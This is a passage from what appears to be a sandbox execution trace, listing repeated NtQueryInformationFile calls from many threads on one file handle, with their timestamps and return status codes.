0xc0000002 Thread: id = 1721 os_tid = 0xb88 [0165.598] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf880, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf880, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1722 os_tid = 0xb8c [0165.600] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f8a8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f8a8, FileInformation=0x210e20) returned 0x0 Thread: id = 1723 os_tid = 0x700 [0165.602] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fba0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fba0, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1724 os_tid = 0x6f0 [0165.604] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f830, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f830, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1725 os_tid = 0x130 [0165.606] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfd18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfd18, FileInformation=0x210e20) returned 0x0 Thread: id = 1726 os_tid = 0x754 [0165.608] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fab8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fab8, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1727 os_tid = 0x72c [0165.610] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fda8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fda8, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1728 os_tid = 0x748 [0165.612] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fd78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fd78, FileInformation=0x210e20) returned 0x0 Thread: id = 1729 os_tid = 0x928 [0165.614] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f7a0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f7a0, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1730 os_tid = 0xcc [0165.619] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fc48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fc48, FileInformation=0x210e20) returned 0x0 Thread: id = 1731 os_tid = 0xd0 [0165.621] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fae8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fae8, FileInformation=0x210e20) returned 0x0 Thread: id = 1732 os_tid = 0xd4 [0165.623] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fe88, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fe88, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1733 os_tid = 0xd8 [0165.625] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fbc8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fbc8, FileInformation=0x210e20) returned 0x0 Thread: id = 1734 os_tid = 0xdc [0165.626] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fce8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fce8, FileInformation=0x210e20) returned 0x0 Thread: id = 1735 os_tid = 0xe0 [0165.629] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371feb8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371feb8, FileInformation=0x210e20) returned 0x0 Thread: id = 1736 os_tid = 0xe4 [0165.630] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffb28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffb28, FileInformation=0x210e20) returned 0x0 Thread: id = 1737 os_tid = 0xe8 [0165.633] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffe50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffe50, FileInformation=0x210e20) returned 0x0 Thread: id = 1738 os_tid = 0xec [0165.634] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fe00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fe00, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1739 os_tid = 0x9d8 [0165.636] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fe60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fe60, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1740 os_tid = 0x898 [0165.638] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f8c0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f8c0, FileInformation=0x210e20) returned 0x0 Thread: id = 1741 os_tid = 0x48c [0165.640] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fc50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fc50, FileInformation=0x210e20) returned 0x0 Thread: id = 1742 os_tid = 0x6a4 [0165.642] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bff68, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bff68, FileInformation=0x210e20) returned 0x0 Thread: id = 1743 os_tid = 0x20c [0165.644] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361ff30, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361ff30, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1744 os_tid = 0x630 [0165.646] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fe28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fe28, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1745 os_tid = 0x5e4 [0165.648] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fd40, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fd40, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1746 os_tid = 0xb28 [0165.662] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f9c8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f9c8, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1747 os_tid = 0xb20 [0165.664] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fd48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fd48, FileInformation=0x210e20) returned 0x0 Thread: id = 1748 os_tid = 0x704 [0165.666] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fca8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fca8, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1749 os_tid = 0x568 [0165.668] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fce0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fce0, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1750 os_tid = 0x5ac [0165.670] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dff20, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dff20, FileInformation=0x210e20) returned 0x0 Thread: id = 1751 os_tid = 0x908 [0165.672] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fcd0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fcd0, FileInformation=0x210e20) returned 0x0 Thread: id = 1752 os_tid = 0x888 [0165.674] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fa48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fa48, FileInformation=0x210e20) returned 0x0 Thread: id = 1753 os_tid = 0x544 [0165.676] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f7a8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f7a8, FileInformation=0x210e20) returned 0x0 Thread: id = 1754 os_tid = 0x76c [0165.678] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fb00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fb00, FileInformation=0x210e20) returned 0x0 Thread: id = 1755 os_tid = 0xa9c [0165.680] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f7b8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f7b8, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1756 os_tid = 0x114 [0165.682] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fe58, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fe58, FileInformation=0x210e20) returned 0x0 Thread: id = 1757 os_tid = 0x5b8 [0165.684] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f810, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f810, FileInformation=0x210e20) returned 0x0 Thread: id = 1758 os_tid = 0x814 [0165.686] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfd00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfd00, FileInformation=0x210e20) returned 0x0 Thread: id = 1759 os_tid = 0x834 [0165.688] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357f7e8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357f7e8, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1760 os_tid = 0x884 [0165.690] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffc00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffc00, FileInformation=0x210e20) returned 0x0 Thread: id = 1761 os_tid = 0x5d4 [0165.693] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f840, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f840, FileInformation=0x210e20) returned 0x0 Thread: id = 1762 os_tid = 0x340 [0165.695] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fcc0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fcc0, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1763 os_tid = 0x810 [0165.701] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fcf8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fcf8, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1764 os_tid = 0x830 [0165.703] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffba0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffba0, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1765 os_tid = 0x880 [0165.705] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df9c0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df9c0, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1766 os_tid = 0xae4 [0165.709] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfde8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfde8, FileInformation=0x210e20) returned 0x0 Thread: id = 1767 os_tid = 0x570 [0165.711] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f960, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f960, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1768 os_tid = 0xb40 [0165.713] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf838, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf838, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1769 os_tid = 0x5f4 [0165.715] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfb20, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfb20, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1770 os_tid = 0xbb8 [0165.716] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35fff58, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35fff58, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1771 os_tid = 0x598 [0165.718] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f8f0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f8f0, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1772 os_tid = 0x4e4 [0165.720] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363ff80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363ff80, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1773 os_tid = 0xbfc [0165.722] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f950, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f950, FileInformation=0x210e20) returned 0x0 Thread: id = 1774 os_tid = 0x80c [0165.724] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fb90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fb90, FileInformation=0x210e20) returned 0x0 Thread: id = 1775 os_tid = 0xbf8 [0165.727] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373ff78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373ff78, FileInformation=0x210e20) returned 0x0 Thread: id = 1776 os_tid = 0x524 [0165.729] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfa48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfa48, FileInformation=0x210e20) returned 0x0 Thread: id = 1777 os_tid = 0x674 [0165.731] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fd40, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fd40, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1778 os_tid = 0x4a0 [0165.733] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fd38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fd38, FileInformation=0x210e20) returned 0x0 Thread: id = 1779 os_tid = 0x5d8 [0165.735] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fce0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fce0, FileInformation=0x210e20) returned 0x0 Thread: id = 1780 os_tid = 0x69c [0165.737] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f870, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f870, FileInformation=0x210e20) returned 0x0 Thread: id = 1781 os_tid = 0xb74 [0165.739] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f7a0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f7a0, FileInformation=0x210e20) returned 0x0 Thread: id = 1782 os_tid = 0x6a8 [0165.741] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fe18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fe18, FileInformation=0x210e20) returned 0x0 Thread: id = 1783 os_tid = 0xb68 [0165.746] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfb40, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfb40, FileInformation=0x210e20) returned 0x0 Thread: id = 1784 os_tid = 0x758 [0165.747] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365ff28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365ff28, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1785 os_tid = 0x3d4 [0165.749] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfb98, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfb98, FileInformation=0x210e20) returned 0x0 Thread: id = 1786 os_tid = 0x484 [0165.751] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f888, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f888, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1787 os_tid = 0xb4c [0165.753] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfd60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfd60, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1788 os_tid = 0xa1c [0165.755] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f890, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f890, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1789 os_tid = 0x2ac [0165.757] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fba8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fba8, FileInformation=0x210e20) returned 0x0 Thread: id = 1790 os_tid = 0xa8c [0165.759] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361ff48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361ff48, FileInformation=0x210e20) returned 0x0 Thread: id = 1791 os_tid = 0x68c [0165.761] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffd80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffd80, FileInformation=0x210e20) returned 0x0 Thread: id = 1792 os_tid = 0x388 [0165.763] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfa58, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfa58, FileInformation=0x210e20) returned 0x0 Thread: id = 1793 os_tid = 0xa50 [0165.764] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fe50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fe50, FileInformation=0x210e20) returned 0x0 Thread: id = 1794 os_tid = 0x75c [0165.766] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffd80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffd80, FileInformation=0x210e20) returned 0x0 Thread: id = 1795 os_tid = 0x240 [0165.768] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f968, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f968, FileInformation=0x210e20) returned 0x0 Thread: id = 1796 os_tid = 0x320 [0165.770] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fcf8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fcf8, FileInformation=0x210e20) returned 0x0 Thread: id = 1797 os_tid = 0x3b4 [0165.772] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f880, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f880, FileInformation=0x210e20) returned 0x0 Thread: id = 1798 os_tid = 0x760 [0165.774] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fa40, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fa40, FileInformation=0x210e20) returned 0x0 Thread: id = 1799 os_tid = 0xb00 [0165.776] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373ff30, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373ff30, FileInformation=0x210e20) returned 0x0 Thread: id = 1800 os_tid = 0x7fc [0165.778] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f958, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f958, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1801 os_tid = 0xb18 [0165.780] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f968, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f968, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1802 os_tid = 0xa68 [0165.781] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fbc0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fbc0, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1803 os_tid = 0x224 [0165.783] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fa28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fa28, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1804 os_tid = 0x2c4 [0165.785] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fe60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fe60, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1805 os_tid = 0x24c [0165.787] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df830, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df830, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1806 os_tid = 0x4e8 [0165.789] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfb88, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfb88, FileInformation=0x210e20) returned 0x0 Thread: id = 1807 os_tid = 0x220 [0165.790] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fc38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fc38, FileInformation=0x210e20) returned 0x0 Thread: id = 1808 os_tid = 0xb04 [0165.792] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f9a8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f9a8, FileInformation=0x210e20) returned 0x0 Thread: id = 1809 os_tid = 0x180 [0165.794] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fc08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fc08, FileInformation=0x210e20) returned 0x0 Thread: id = 1810 os_tid = 0x53c [0165.796] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf808, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf808, FileInformation=0x210e20) returned 0x0 Thread: id = 1811 os_tid = 0x5b4 [0165.799] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373faa8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373faa8, FileInformation=0x210e20) returned 0x0 Thread: id = 1812 os_tid = 0x614 [0165.801] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfbc8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfbc8, FileInformation=0x210e20) returned 0x0 Thread: id = 1813 os_tid = 0x690 [0165.806] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf948, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf948, FileInformation=0x210e20) returned 0x0 Thread: id = 1814 os_tid = 0x440 [0165.812] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f9b0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f9b0, FileInformation=0x210e20) returned 0x0 Thread: id = 1815 os_tid = 0x7d8 [0165.814] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f908, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f908, FileInformation=0x210e20) returned 0x0 Thread: id = 1816 os_tid = 0xa60 [0165.816] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f960, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f960, FileInformation=0x210e20) returned 0x0 Thread: id = 1817 os_tid = 0xb24 [0165.818] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fb70, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fb70, FileInformation=0x210e20) returned 0x0 Thread: id = 1818 os_tid = 0x878 [0165.820] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf900, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf900, FileInformation=0x210e20) returned 0x0 Thread: id = 1819 os_tid = 0xb1c [0165.822] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df7d0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df7d0, FileInformation=0x210e20) returned 0x0 Thread: id = 1820 os_tid = 0xb08 [0165.824] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfe08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfe08, FileInformation=0x210e20) returned 0x0 Thread: id = 1821 os_tid = 0x4fc [0165.826] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fb18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fb18, FileInformation=0x210e20) returned 0x0 Thread: id = 1822 os_tid = 0x4dc [0165.828] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfe80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfe80, FileInformation=0x210e20) returned 0x0 Thread: id = 1823 os_tid = 0x43c [0165.830] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f908, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f908, FileInformation=0x210e20) returned 0x0 Thread: id = 1824 os_tid = 0x1c4 [0165.832] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfcb8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfcb8, FileInformation=0x210e20) returned 0x0 Thread: id = 1825 os_tid = 0xbec [0165.834] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f8b8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f8b8, FileInformation=0x210e20) returned 0x0 Thread: id = 1826 os_tid = 0xb48 [0165.836] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfe10, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfe10, FileInformation=0x210e20) returned 0x0 Thread: id = 1827 os_tid = 0x5bc [0165.838] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfe48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfe48, FileInformation=0x210e20) returned 0x0 Thread: id = 1828 os_tid = 0x6b8 [0165.840] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367ff38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367ff38, FileInformation=0x210e20) returned 0x0 Thread: id = 1829 os_tid = 0x2dc [0165.846] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffd08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffd08, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1830 os_tid = 0x158 